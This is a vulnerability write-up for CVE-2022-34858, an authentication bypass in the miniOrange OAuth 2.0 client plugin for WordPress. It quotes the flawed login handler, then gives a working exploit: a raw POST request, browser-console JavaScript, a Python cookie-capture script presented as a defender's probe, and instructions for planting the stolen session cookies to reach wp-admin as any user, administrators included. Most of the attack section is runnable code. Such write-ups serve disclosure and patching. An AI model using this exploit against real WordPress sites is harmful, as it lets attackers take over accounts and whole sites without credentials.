CVE-2022-34858: OAuth 2.0 client for SSO by miniOrange WordPress plugin Authentication Bypass

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.

The plugin was affected by an authentication bypass. To log in as any user we only need to know that user's email address; no password, token or OAuth round trip is involved. If the email belongs to an administrator, the session we obtain on the client website is an administrator session.

Let’s check the plugin

The mo_oauth_login_validate() function includes the following request handling:

if ( isset( $_REQUEST['option'] ) and strpos( $_REQUEST['option'], 'mooauth' ) !== false ) {

    $user_email = '';
    if ( array_key_exists( 'email', $_POST ) ) {
        $user_email = sanitize_email( $_POST['email'] );
    }
    
    if ( $user_email ) {
        if ( email_exists( $user_email ) ) { // user is a member
            $user    = get_user_by( 'email', $user_email );
            $user_id = $user->ID;
            wp_set_auth_cookie( $user_id, true );
        } else { // this user is a guest
            $random_password = wp_generate_password( 10, false );
            $user_id         = wp_create_user( $user_email, $random_password, $user_email );
            wp_set_auth_cookie( $user_id, true );
        }
    }
    wp_redirect( home_url() );
    exit;
}

The code shows that if the request carries an option value containing the substring "mooauth" (read from $_REQUEST, so GET or POST both work) together with a non-empty $_POST['email'], the plugin calls wp_set_auth_cookie() for the matching user straight away. Nothing about the OAuth flow is checked first: no state parameter, no authorization code exchange, no ID token or userinfo response from the provider. Because the second argument is true, the cookies are "remember me" cookies, so the forged session lasts for WordPress's default of 14 days rather than two.

The other problem is the else branch: if the email does not belong to an existing account, the plugin calls wp_create_user() and logs the new user in, regardless of whether registration is enabled on the site (the users_can_register option is never consulted). The new account gets the site's default role, so on a stock installation this still yields a Subscriber session.

Let’s see how we can exploit this vulnerability

A single POST request is enough to exploit this vulnerability.

The HTTP request to https://lana.solutions/vdb/miniorange-oauth-client/, a test WordPress website:

POST /vdb/miniorange-oauth-client/ HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

option=mooauth&[email protected]

Let's try it the easiest way. I wrote a small piece of JavaScript for the exploit that sends the same POST request, so we can do this straight from a browser: open the client's website, https://lana.solutions/vdb/miniorange-oauth-client/ in our case, open the developer console and enter the following code:

// Same POST as above, sent from the page's own origin so the browser
// stores the cookies that wp_set_auth_cookie() sets on the response.
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://lana.solutions/vdb/miniorange-oauth-client/', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.onload = function() {
    // The plugin answers with a redirect to the home page; once that has
    // completed the session cookies are in place and wp-admin lets us in.
    window.location.href = 'https://lana.solutions/vdb/miniorange-oauth-client/wp-admin/';
}
xhr.send('option=mooauth&[email protected]');

After successful login, the script will redirect us to the WordPress admin.

The exploit script

I created a Python script that returns the WordPress logged_in cookie:

Source: miniorange_oauth_client_plugin_vdb_get_exploit_cookie.py

How to use:

python3 miniorange_oauth_client_plugin_vdb_get_exploit_cookie.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux terminal.

We get something like this:

wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6

Then all we have to do is set this cookie in the browser on the client's website, for example from the JavaScript console, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/. The hash suffix in the cookie name is the md5 of the site's siteurl option, so it is specific to the target site. Note that the logged_in cookie is what the front end checks; the dashboard validates the separate auth cookie (wordpress_sec_<hash> over HTTPS, scoped to the wp-admin path), which the same response sets as well, so capture and set that one too if you want into wp-admin.

document.cookie="wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6"; location.reload();
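As an added example (not the author's script referenced above, and not part of the original write-up), the probe below sends the request shown earlier and decodes whatever WordPress session cookies come back, which is the check a defender can run against a site to confirm whether the plugin still hands out a session for a bare email. It assumes the client site's root URL is passed on the command line; the constructed Set-Cookie sample at the bottom wraps the cookie value the write-up shows so the parser can be exercised offline.

```python
# Added example: probe a WordPress site for the CVE-2022-34858 behaviour and
# decode the session cookies in the response. Only the standard library is used.
import sys
import urllib.parse
import urllib.request
from urllib.error import HTTPError

# WordPress session cookies are wordpress_sec_<hash> (auth, HTTPS, wp-admin
# path), wordpress_<hash> (auth over plain HTTP) and wordpress_logged_in_<hash>
# (front end). <hash> is md5 of the siteurl option, so it differs per site.


def build_request(client_url: str, email: str) -> urllib.request.Request:
    """The POST the write-up shows: option=mooauth plus the victim's email."""
    body = urllib.parse.urlencode({"option": "mooauth", "email": email}).encode()
    return urllib.request.Request(
        client_url,
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )


def parse_wp_cookies(set_cookie_headers):
    """Return the WordPress session cookies found in Set-Cookie headers, each
    split into the four fields WordPress packs into the value:
    user|expiration|token|hmac ('|' arrives URL-encoded as %7C)."""
    found = []
    for header in set_cookie_headers:
        name, _, rest = header.partition("=")
        name = name.strip()
        if not name.startswith("wordpress_"):
            continue
        raw_value = rest.split(";", 1)[0]
        fields = urllib.parse.unquote(raw_value).split("|")
        if len(fields) != 4:  # e.g. wordpress_test_cookie, not a session
            continue
        found.append({
            "name": name,
            "value": raw_value,
            "user": fields[0],
            "expiration": int(fields[1]),
            "token": fields[2],
            "hmac": fields[3],
        })
    return found


def session_user(cookies):
    """Username the logged_in cookie would identify us as, or None."""
    for c in cookies:
        if c["name"].startswith("wordpress_logged_in_"):
            return c["user"]
    return None


def probe(client_url: str, email: str):
    """Send the request without following the 302 from wp_redirect(): the
    Set-Cookie headers we want are on that redirect response itself."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # tell urllib not to follow

    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(build_request(client_url, email), timeout=15)
    except HTTPError as err:  # an unfollowed 302 surfaces as HTTPError
        resp = err
    return parse_wp_cookies(resp.headers.get_all("Set-Cookie") or [])


# Constructed sample header (assumption: path and flags are illustrative),
# built around the cookie value shown in the write-up.
SAMPLE_SET_COOKIE = [
    "wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1="
    "test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx"
    "%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6"
    "; path=/vdb/miniorange-oauth-client/; secure; HttpOnly",
]


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <client_url> <email>")
    cookies = probe(sys.argv[1], sys.argv[2])
    user = session_user(cookies)
    if user is None:
        print("no WordPress session cookie returned: not vulnerable, or plugin inactive")
    else:
        print(f"vulnerable: session issued for user {user!r}")
        for c in cookies:  # both the auth and the logged_in cookie, when present
            print(f"{c['name']}={c['value']}")
```

Run it as `python3 probe.py https://lana.solutions/vdb/miniorange-oauth-client/ <email>`; a site that answers the bare POST with any wordpress_* session cookie is vulnerable, and printing every session cookie rather than only the logged_in one is what lets you reach wp-admin, which checks the auth cookie rather than the logged_in one.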

The professional exploit script

I also created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py

How to use:

python3 miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux (desktop version) terminal.

Try it

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities so that you can only get low-level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/

Additional tests

I created a Postman request for the exploit: Postman Web – MiniOrange Auth Request

Anyone can use it after forking it; the required variables are stored in the collection.

Related news

CVE-2022-34858: WordPress OAuth 2.0 client for SSO plugin <= 1.11.3 - Authentication Bypass vulnerability - Patchstack